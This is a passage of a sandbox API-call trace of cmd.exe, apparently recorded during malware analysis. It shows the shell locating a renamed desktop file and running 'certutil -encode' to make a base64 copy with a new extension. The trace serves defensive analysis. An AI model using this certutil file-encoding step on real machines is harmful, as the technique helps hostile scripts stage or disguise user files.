ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cfa0 [0220.230] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0220.231] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xadd5dd4c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xadd5dd4c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cb80 [0220.231] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0220.231] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\d_S3PO8QIc.gif.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301a1f60, ftCreationTime.dwHighDateTime=0x1d5eb5a, ftLastAccessTime.dwLowDateTime=0xb6aa1d60, ftLastAccessTime.dwHighDateTime=0x1d5ee1a, ftLastWriteTime.dwLowDateTime=0xb6aa1d60, ftLastWriteTime.dwHighDateTime=0x1d5ee1a, nFileSizeHigh=0x0, nFileSizeLow=0x7af5, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="d_S3PO8QIc.gif.Sister", cAlternateFileName="D_S3PO~1.SIS")) returned 0x21ed8c7cfa0 [0220.231] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0220.231] _wcsnicmp (_String1="D_S3PO~1.SIS", _String2="d_S3PO8QIc.gif.Sister", _MaxCount=0x15) returned 70 [0220.231] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0220.231] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0220.231] GetProcessHeap () returned 0x21ed8c70000 [0220.289] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8cc8790 [0220.289] ??_V@YAXPEAX@Z () returned 0x1 [0220.289] ??_V@YAXPEAX@Z () returned 0x1 [0220.289] GetProcessHeap () returned 0x21ed8c70000 [0220.289] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937af70, Size=0x1d0) returned 0x21ed937af70 [0220.289] GetProcessHeap () returned 0x21ed8c70000 [0220.289] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937af70) returned 0x1d0 [0220.289] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0220.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.289] GetFileType (hFile=0x50) returned 0x2 [0220.290] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.290] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0220.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.291] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0220.298] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0220.298] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0220.298] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0220.298] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0220.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.298] GetFileType (hFile=0x50) returned 0x2 [0220.298] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.298] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0220.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.299] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0220.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.299] GetFileType (hFile=0x50) returned 0x2 [0220.299] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.299] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0220.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.300] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed937af10*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed937af10*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0220.300] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"d_S3PO8QIc.gif.Sister\" \"d_S3PO8QIc.gif.Cruel\" ") returned 56 [0220.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.300] GetFileType (hFile=0x50) returned 0x2 [0220.301] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.301] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0220.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.301] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x38, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x38) returned 1 [0220.303] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0220.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.303] GetFileType (hFile=0x50) returned 0x2 [0220.303] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.303] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0220.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.303] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0220.308] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0220.308] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0220.308] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0220.308] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0220.308] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0220.308] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0220.308] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0220.308] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0220.308] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0220.308] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0220.308] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0220.309] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0220.309] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0220.309] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0220.309] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0220.309] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0220.309] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0220.309] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0220.309] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0220.309] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0220.309] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0220.309] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0220.309] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0220.309] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0220.309] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0220.309] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0220.309] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0220.309] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0220.309] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0220.309] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0220.309] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0220.309] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0220.309] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0220.309] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0220.309] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0220.309] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0220.309] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0220.310] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0220.310] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0220.310] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0220.310] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0220.310] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0220.310] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0220.310] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0220.310] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0220.310] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0220.310] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0220.310] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0220.310] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0220.310] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0220.310] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0220.310] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0220.310] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0220.310] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0220.310] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0220.310] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0220.310] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0220.312] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0220.312] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0220.312] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0220.312] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0220.312] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0220.312] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0220.312] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0220.312] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0220.312] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0220.312] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0220.312] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0220.312] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0220.312] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0220.312] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0220.312] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0220.312] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0220.312] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0220.312] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0220.312] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0220.313] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0220.313] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0220.313] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0220.313] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0220.313] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0220.313] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0220.313] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0220.313] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0220.313] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0220.313] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0220.313] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0220.313] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0220.313] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0220.313] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0220.313] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0220.313] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0220.313] ??_V@YAXPEAX@Z () returned 0x1 [0220.313] GetProcessHeap () returned 0x21ed8c70000 [0220.313] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cd9820 [0220.313] GetProcessHeap () returned 0x21ed8c70000 [0220.313] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x92) returned 0x21ed8d65bb0 [0220.314] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0220.314] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0220.314] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0220.314] GetProcessHeap () returned 0x21ed8c70000 [0220.314] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8ce9810 [0220.315] SetErrorMode (uMode=0x0) returned 0x0 [0220.315] SetErrorMode (uMode=0x1) returned 0x0 [0220.315] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8ce9820, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0220.315] SetErrorMode (uMode=0x0) returned 0x1 [0220.315] GetProcessHeap () returned 0x21ed8c70000 [0220.315] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8ce9810, Size=0x52) returned 0x21ed8ce9810 [0220.316] GetProcessHeap () returned 0x21ed8c70000 [0220.316] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8ce9810) returned 0x52 [0220.316] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0220.316] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0220.316] GetProcessHeap () returned 0x21ed8c70000 [0220.316] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5ef00 [0220.316] GetProcessHeap () returned 0x21ed8c70000 [0220.316] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d66a00 [0220.316] GetProcessHeap () returned 0x21ed8c70000 [0220.316] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66a00, Size=0x1be) returned 0x21ed8d66a00 [0220.316] GetProcessHeap () returned 0x21ed8c70000 [0220.316] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66a00) returned 0x1be [0220.316] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.316] GetProcessHeap () returned 0x21ed8c70000 [0220.316] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d42880 [0220.316] GetProcessHeap () returned 0x21ed8c70000 [0220.316] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d42880, Size=0x7e) returned 0x21ed8d42880 [0220.316] GetProcessHeap () returned 0x21ed8c70000 [0220.316] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d42880) returned 0x7e [0220.317] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.317] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0220.317] GetLastError () returned 0x2 [0220.317] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.321] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0220.321] GetLastError () returned 0x2 [0220.321] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.321] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0220.321] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0220.321] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0220.322] GetLastError () returned 0x2 [0220.322] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0220.322] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0220.322] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0220.322] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0220.322] ??_V@YAXPEAX@Z () returned 0x1 [0220.322] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0220.323] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0220.323] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0220.323] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0220.323] GetProcessHeap () returned 0x21ed8c70000 [0220.323] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45bf0 [0220.323] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.323] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0220.323] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.323] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.323] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0220.323] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.323] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.323] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.323] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.323] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.323] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.323] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.324] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.324] GetProcessHeap () returned 0x21ed8c70000 [0220.325] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bf0) returned 1 [0220.325] GetProcessHeap () returned 0x21ed8c70000 [0220.325] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95520 [0220.325] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0220.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.325] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0220.325] _get_osfhandle (_FileHandle=0) returned 0x4c [0220.325] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0220.326] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"d_S3PO8QIc.gif.Sister\" \"d_S3PO8QIc.gif.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"d_S3PO8QIc.gif.Sister\" \"d_S3PO8QIc.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"d_S3PO8QIc.gif.Sister\" \"d_S3PO8QIc.gif.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xda0, dwThreadId=0x58)) returned 1 [0220.335] CloseHandle (hObject=0xa8) returned 1 [0220.335] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0220.335] GetProcessHeap () returned 0x21ed8c70000 [0220.335] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0220.335] GetEnvironmentStringsW () returned 0x21ed9980080* [0220.335] GetProcessHeap () returned 0x21ed8c70000 [0220.335] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0220.335] FreeEnvironmentStringsA (penv="=") returned 1 [0220.336] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0220.717] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0220.717] CloseHandle (hObject=0xa4) returned 1 [0220.717] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0220.717] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0220.717] GetProcessHeap () returned 0x21ed8c70000 [0220.718] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 